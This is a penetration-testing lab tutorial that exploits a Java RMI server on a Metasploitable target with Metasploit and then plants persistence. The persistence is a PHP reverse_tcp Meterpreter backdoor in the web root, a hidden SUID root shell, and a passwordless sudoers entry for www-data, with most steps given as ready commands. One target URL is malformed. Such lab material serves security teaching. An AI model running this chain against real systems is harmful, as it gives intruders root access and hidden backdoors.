Lesson 6 Lab Notes

In this lab we will do the following:
  • Update the java_rmi_server Metasploit module
  • Exploit the RMI Server
  • Create SUID backdoor
  • Create SUDO backdoor
  • Create PHP reverse_tcp Meterpreter Backdoor
  • Obtain root
What is Java RMI?

The RMI protocol makes use of two other protocols for its on-the-wire format: Java Object Serialization and HTTP. Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. One of the features of the Java RMI protocol is to load classes remotely. So, imagine a perfect storm of where a particular version of the Java RMI Server, with a default insecure configuration, allows the loading of classes from any remote (HTTP) URL and further imagine that no authentication is required to load these Java classes.

What is SUID?

SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user(e.g., www-data) to run a program/file with the permissions of the file owner(e.g., root) rather that the user(e.g., www-data) who runs it. In other words, if an unprivileged user(e.g., www-data) executes a copied shell that is owned by root that has its SUID bit set, then the un-privileged user(e.g., www-data) will have an effective userID (EUID) as root.

What is SUDO?

Sudo stands for Superuser, it allows a permitted user to execute a command as the superuser or another user, as specified in the /etc/sudoers file.

CVE Information:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1537

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via vectors related to RMI. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to the default java.rmi.server.useCodebaseOnly setting of false, which allows remote attackers to perform "dynamic class downloading" and execute arbitrary code.

Module Information:

Rapid7 shows you what metasploit module to use https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server

And exploit-db, shows you the code of the module https://www.exploit-db.com/exploits/17535/

exploit/multi/misc/java_rmi_server

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Instructions:

Use mkdir to create the /var/tmp/RB and the /opt/framework/msf3/modules/exploits/multi/misc directories, using -p switch to suppress errors if the directory already exists.

mkdir -p /opt/framework/msf3/modules/exploits/multi/misc
mkdir -p /var/tmp/RB/
cd /var/tmp/RB/

Use wget to download the new java_rmi_server.rb module.wget

wget --no-check-certificate https://raw.githubusercontent.com/rapid7/metasploit-framework/ee9b1aa83a0010d6a960b8a11afe7efa5ffef873/modules/exploits/multi/misc/java_rmi_server.rb

Use cp to place the java_rmi_server.rb module into /opt/framework/msf3/modules/exploits/multi/misc/ and use the -l switch is used to display the file attributes.

cp java_rmi_server.rb /opt/framework/msf3/modules/exploits/multi/misc/
ls -l /opt/framework/msf3/modules/exploits/multi/misc/java_rmi_server.rb

Exploit the RMI Registry Server

Use the script command to create a typescript, that will store all the terminal output into the msfconsole_rmi.txt file.

script msfconsole_rmi.txt
msfconsole
search java_rmi
use exploit/multi/misc/java_rmi_server
show options
set RHOST 172.16.56.2
show options
exploit

Notice the meterpreter session for the first time! Type in help to show all the available options that can be used for this particular exploit.

help

Got root?

ipconfig (to display interfaces and their ip addresses.)
getuid (to get the user that the server is running as.)
sysinfo (to get information about the remote system, such as Computer Name, OS and Meterpreter.

Persistence 101

After gaining your first shell, you should immediately be thinking about establishing another persistence connection just in case the vulnerability is later patched. "Two is one, and one is none". The following section will show you how to establish a multi handler, create a PHP Backdoor, and how to set its payload.

background
sessions -l
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
show options
Both LHOST and LPORT are Required Settings
set LHOST 172.16.56.4
set LPORT 1099

Use set ExitOnSession false to stay in listening mode even if the PHP Meterpreter session dies. It is very possible that the PHP Meterpreter session will time out, but you can always reconnect. We are going to run this exploit in the background so it can continue to listen for incoming connections.

set ExitOnSession false
exploit -j

Set Up PHP Backdoor

use payload/php/meterpreter/reverse_tcp
show options
set LHOST 172.16.56.4
set LPORT 1099
show options

Generate PHP Backdoor

Use generate -t raw -f backdoor.php to generate a reverse_tcp meterpreter PHP Payload. Use the -t switch to specify the output format (i.e. raw,ruby,rb,perl & more). Use the -f switch to specify the filename. The file will be created in the same directory in which the msfconsole was executed from.

generate -t raw -f backdoor.php
pwd
ls -l backdoor.php
cat backdoor.php

The pwd command was used to display the current working directory. In my case, the php file was created in /var/temp/RB directory. We then used cat to output the contents of the php file. Notice the comment aka /* in front of the string /*<?php, we need to remove it in order for our Apache web server to execute the script! We also need to add a ?> php tag to the end of the file or else it will error out.

Enable PHP Backdoor

In another terminal type in the following command -

gedit /var/tmp/RB/backdoor.php

Delete the /* command, add ?> to the end then save and close the php file.

Basic Web Server Interrogation

sessions -l
sessions -i 1
shell
ps -eaf | egrep '(http|apache)' | grep -v grep

Notice the webserver is Apache2 running as www-data.

Locate the Apache Root Directory

ls -l /etc | grep release
cat /etc/lsb-release
cd /var/www
ls -l

In most Linux distributions, a /etc/*release will exist that contains the Linux OS and Version. We used grep to find the exact file name, then used cat to find out that the OS is Ubuntu and the Version is 8.04.

Create SUID Backdoor

which sh
cp `which sh` .backdoor
ls -l .backdoor
chmod 4777 .backdoor
ls -l .backdoor

We used the command which sh to ask Linux if it can locate the path of the command interpreter shell. Then we copied the file using cp, placing a dot in front of it to hide the file from unspecified listing. ls -l .backdoor showed us the current file permissions which were -rwxr-xr-x. This stands for:

  • read = 4
  • write = 2
  • execute = 1
  • ' - ' = 0

So, the root user (rwx) permissions are set to 7, (r=4 + w=2 + x=1). The root group (r-x) permissions are set to 5, (r=4 + x=1). The world (r-x) permissions are set to 5, (r=4 + x=1). At these permission settings, if a regular/unprivileged user (e.g., www-data) executes this shell, nothing special will happen.

To overcome that, we had to use chmod 4777 to grant full permissions to the user (rwx), group (rwx), world (rwx). In addition, we will set the SUID to 4 on the root user (rwx) permission to allow any user (e.g., www-data) to not only execute the shell, but to gain an EUID (effective UserID) as root.

Create SUDO Backdoor

ps -eaf | grep apache2
ls -l /etc/sudoers
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers
grep ""www-data" /etc/sudoers
exit

ps -eaf is used to display all processes and pipe it through grep to only output processes that contains apache2. ls -l is used to display the attributes of the /etc/sudoers file and echo >> is used to append www-data ALL=NOPASSWD: ALL to the end of the /etc/sudoers file. This allows the user, www-data, to have equivalent permissions to the root user, thereby using the sudo command to issue any command without having to supply a password (ALL=NOPASSWD). Now that the sudo backdoor account has been enabled, we can exit the shell session to go back to the meterpreter session.

Upload PHP Backdoor

pwd
cd /var/www
upload backdoor.php .
ls

upload backdoor.php . is not a typo. Using a dot at the end is short hand for the current working directory.

Establishing A Second Session

background

Click on the Firefox icon and type in -

http://172.16.56.16.2/backdoor.php

Click on back to your Terminal window to verify that the persistent PHP connection from the victim to your Kali VM was successful by typing in -

sessions -l
sessions -i 2
Replace (2) with your php meterpreter session ID.

Obtain root with SUID Backdoor

shell
pwd
./.backdoor
id
whoami
./.backdoor -p
id
whoami

./.backdoor was used as an attempt to execute our backdoor sh shell followed by the id command to view the real, effective user, and group IDs ownership of the user.

The shell did not work because the euid was not set to root.
That is why we used ./.backdoor with the -p switch to make the shell privileged followed by the id command to verify that the euid (effective userid) is set to root.

Re-Establishing PHP Meterpreter Session

exit (to exit the (backdoor -p) privileged shell)
exit (to exit the backdoor non-privileged shell)
exit (to exit the command shell executed from the meterpreter session)
exit (to exit the PHP Meterpreter session)
sessions -l

Notice Meterpreter session #2 died but the java_rmi Meterpreter session #1 still exists. Remember earlier that we set the set ExitOnSession false to allows multi handler to continue to listen despite exited, lost, or killed PHP Meterpreter sessions.

Click on the Firefox Window in the taskbar.

Click on the reload icon.

Click on back to your terminal and type in

sessions -l

Obtain your php/meterpreter ID

sessions -i 3
Replace (3) with your php/meterpreter ID.

That's all for now but you can click on the link below if you want to dive deeper into this topic, like create backdoor sudo accounts, vim exploits or forensics capture.

http://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson5/index.html

results matching ""

    No results matching ""